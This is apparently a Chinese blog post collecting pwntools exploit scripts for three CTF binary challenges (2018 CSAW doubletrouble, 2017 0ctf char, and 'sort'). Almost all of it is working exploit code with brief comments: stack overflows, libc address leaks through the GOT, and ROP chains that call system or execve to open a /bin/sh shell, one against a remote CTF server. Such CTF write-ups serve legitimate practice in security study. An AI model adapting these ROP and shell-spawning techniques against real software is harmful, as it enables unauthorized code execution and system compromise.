Pwn CTF 安全

令人绝望的 Pwn Poc 总结

2018 CSAW - doubletrouble

题目链接:doubletrouble.zip

from pwn import *

local=1

elf=ELF('./doubletrouble')
if local:
    io=process('./doubletrouble')
else:
    io=remote('pwn.chal.csaw.io', 9002)

def d2b(f):
    return struct.pack('<d', f)

def b2d(f):
    return struct.unpack('<d', f)[0]

def sendNum(num):
    print 'sendNum: %.20e' % num
    io.sendlineafter('Give me: ','%.20e' % num)

def sendNumPair(num1,num2):
    sendNum(b2d(p32(num1)+p32(num2)))

def pwn1(): # leak got addr
    io.sendlineafter('How long: ','64')
    for i in range(7): sendNum(-100)
    sendNum(-99) # junk_canary
    sendNum(-98) # junk
    sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
    sendNum(-98) # junk
    sendNumPair(elf.plt['puts'], 0x080498A2) # plt.puts ; ret: [pop edi ; pop ebp ; ret]
    sendNumPair(elf.got['puts'], 0x080498A8) # got.puts ; junk
    sendNumPair(elf.symbols['_start'], 0x080498AC) # program run again ; junk
    for i in range(64-7-7): sendNum(-98)

def pwn2(): # call system & get shell
    io.recvuntil('70:')
    io.recvline() # junk
    data=io.recv(4) # get got addr
    if '***' in data:
        print 'stack smashing detected, try again!'
        exit()
    libc_puts_addr=u32(data)
    if local:
        libc_base_addr=libc_puts_addr-0x67e30
        libc_system_addr=libc_base_addr+0x3d7e0
        libc_sh_addr=libc_base_addr+0x17c968
    else:
        libc_base_addr=libc_puts_addr-0x67b40
        libc_system_addr=libc_base_addr+0x3d200
        libc_sh_addr=libc_base_addr+0x17e0cf
    print 'libc_puts_addr: %s' % hex(libc_puts_addr)
    print 'libc_base_addr: %s' % hex(libc_base_addr)
    print 'libc_system_addr: %s' % hex(libc_system_addr)
    print 'libc_sh_addr: %s' % hex(libc_sh_addr)
    if not local:
        io.recvline() # junk
        stack_addr=int(io.recvline().strip(),16)
        print 'stack_addr: %s' % hex(stack_addr)
    io.sendlineafter('How long: ','64')
    if local:
        for i in range(6): sendNum(-100)
        sendNum(-99) # junk_canary
        sendNum(-98) # junk
        sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
        sendNum(-98) # junk
        sendNumPair(libc_system_addr, 0x080498A2) # got.system ; fake_ret
        sendNumPair(libc_sh_addr, 0x080498A8) # got.str_sh ; junk
        for i in range(64-6-6): sendNum(-98)
    else:
        for i in range(8): sendNum(-100)
        sendNum(-99) # junk_canary
        sendNum(-98) # junk
        sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
        sendNum(-98) # junk
        sendNumPair(libc_system_addr, 0x080498A2) # got.system ; fake_ret
        sendNumPair(stack_addr+0x230, 0x080498A8) # stack.str_command ; junk
        #sendNumPair(0x2F20736C, 0x6E69622F) # ls //bin
        #sendNumPair(0x00000000, 0x6E696230) # \x00 ; junk
        sendNumPair(0x6E69622F, 0x6162722F) # /bin/rba
        sendNumPair(0x00006873, 0x61627230) # sh\x00 ; junk
        for i in range(64-8-8): sendNum(-98)

pwn1()
pwn2()
io.interactive()

2017 0ctf - char

题目链接:char.zip

from pwn import *

io=process('./char')
libc_base=0x5555e000

payload='a'*0x1c+'a'*0x4
payload+=p32(libc_base+0x000a8456) # xchg ebx, ecx ; test edx, edx ; je 0xa8467 ; mov dword ptr [edx], eax ; ret
payload+=p32(libc_base+0x00094b49) # pop ebx ; pop esi ; ret 0x556bb7ec
# str_sh_addr=ebx+esi
payload+=p32(0x2a355b76) # ebx
payload+=p32(0x2b365c76) # esi
payload+=p32(libc_base+0x00187554) # add ebx, esi ; add dword ptr [edx], ecx ; ret
payload+=p32(libc_base+0x000b9940) # mov edx, 0xffffffff ; cmovne eax, edx ; ret
payload+=p32(libc_base+0x000e4d7a) # inc edx ; xor eax, eax ; ret
payload+=p32(libc_base+0x000e6263)*11 # inc eax ; ret
payload+=p32(libc_base+0x00109177) # int 0x80
print payload
io.sendafter('GO : ) \n',payload)

io.interactive()

sort

题目链接:sort.zip

from pwn import *

context.log_level='debug'
io=process('./sort')

def send_num(num):
    io.sendline(str(num))

io.sendlineafter('be sorted: \n','32')
io.recvuntil('no. : \n')

for i in range(0x4):
    send_num(0xfffffffe) # junk code
send_num(0xffffffff) # fake ebp
send_num(0x0804887c) # eip: getinp
send_num(0x080eba24) # fake ret addr
send_num(0x080eba28) # getinp param1: read addr
send_num(0x080eba2C) # getinp param2: read len
for i in range(0x20-10):
    send_num(0x080eba30) # junk code
send_num(0x080eba34) # eip

payload=p32(0x00000000) # \x00\x00\x00\x00
payload+=p32(0x6e69622f) # nib/
payload+=p32(0x0068732f) # \x00hs/
payload+=p32(0xfffffffe)*2 # junk code
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x080eba28) # getinp param1: read addr ; bypass 0x080488B3
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x0000000b) # eax: 0x0b
payload+=p32(0x080481c9) # pop ebx ; ret
payload+=p32(0x080eba2c) # ebx addr: /bin/sh\x00
payload+=p32(0x080dedf5) # pop ecx ; ret
payload+=p32(0x080eba28) # ecx addr: \x00\x00\x00\x00
payload+=p32(0x0806fdda) # pop edx ; ret
payload+=p32(0x080eba28) # edx addr: \x00\x00\x00\x00
payload+=p32(0x0806da43) # int 0x80
io.send(payload)

io.interactive()

标签: Pwn CTF 安全

Comments